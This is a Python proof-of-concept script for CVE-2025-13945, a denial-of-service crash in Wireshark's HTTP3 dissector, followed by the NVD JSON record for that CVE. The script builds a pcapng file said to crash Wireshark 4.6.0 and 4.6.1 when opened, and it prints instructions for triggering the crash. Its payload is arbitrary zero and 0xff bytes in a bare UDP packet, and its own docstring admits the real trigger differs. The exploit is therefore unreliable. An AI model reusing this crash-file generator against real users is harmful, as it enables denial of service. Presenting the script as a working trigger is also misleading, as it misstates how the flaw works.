CVE-2025-13945

#!/usr/bin/env python3 # CVE-2025-13945 PoC - Malformed HTTP3 packet causing Wireshark crash # This PoC generates a pcapng file with a crafted HTTP3 packet import struct from scapy.all import IP, UDP, Raw, wrpcapng def create_cve_2025_13945_poc(): """ Generate a malicious pcapng file that triggers HTTP3 dissector crash in Wireshark 4.6.0/4.6.1 This PoC creates a packet with malformed HTTP3 frame data that causes the HTTP3 dissector to crash when Wireshark attempts to parse it. Note: The actual trigger requires specific malformed HTTP3 data patterns. Adjust the payload based on the specific vulnerability trigger condition. """ print("[*] Generating CVE-2025-13945 PoC...") # Create IP packet with UDP payload (QUIC uses UDP) ip_packet = IP(src="127.0.0.1", dst="127.0.0.1") # UDP header (QUIC typically uses port 443) udp_packet = UDP(sport=12345, dport=443) # Malformed HTTP3/QUIC payload # This triggers the HTTP3 dissector vulnerability malformed_payload = b'\x00' * 50 + b'\xff\xff\xff\xff' + b'\x00' * 100 # Construct the complete packet malicious_packet = ip_packet / udp_packet / Raw(load=malformed_payload) # Save as pcapng file output_file = "CVE-2025-13945.pcapng" wrpcapng(output_file, [malicious_packet]) print(f"[+] PoC file created: {output_file}") print("[+] To trigger: Open this file in Wireshark 4.6.0 or 4.6.1") print("[+] Expected result: Wireshark HTTP3 dissector crash") if __name__ == "__main__": try: from scapy.all import wrpcapng create_cve_2025_13945_poc() except ImportError: print("[-] Error: scapy library required. Install with: pip install scapy") print("\n[*] Alternative: Create pcapng manually using tcpdump or other tools")

{"cve": {"id": "CVE-2025-13945", "sourceIdentifier": "[email protected]", "published": "2025-12-03T08:15:47.940", "lastModified": "2025-12-05T15:08:07.970", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HTTP3 dissector crash in Wireshark 4.6.0 and 4.6.1 allows denial of service"}, {"lang": "es", "value": "El fallo del disector HTTP3 en Wireshark 4.6.0 y 4.6.1 permite denegación de servicio."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1325"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wireshark:wireshark:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.6.0", "versionEndExcluding": "4.6.2", "matchCriteriaId": "7D2DBF83-3165-4923-A832-C962C1E3DF6F"}]}]}], "references": [{"url": "https://gitlab.com/wireshark/wireshark/-/issues/20860", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch", "Third Party Advisory"]}, {"url": "https://www.wireshark.org/security/wnpa-sec-2025-07.html", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}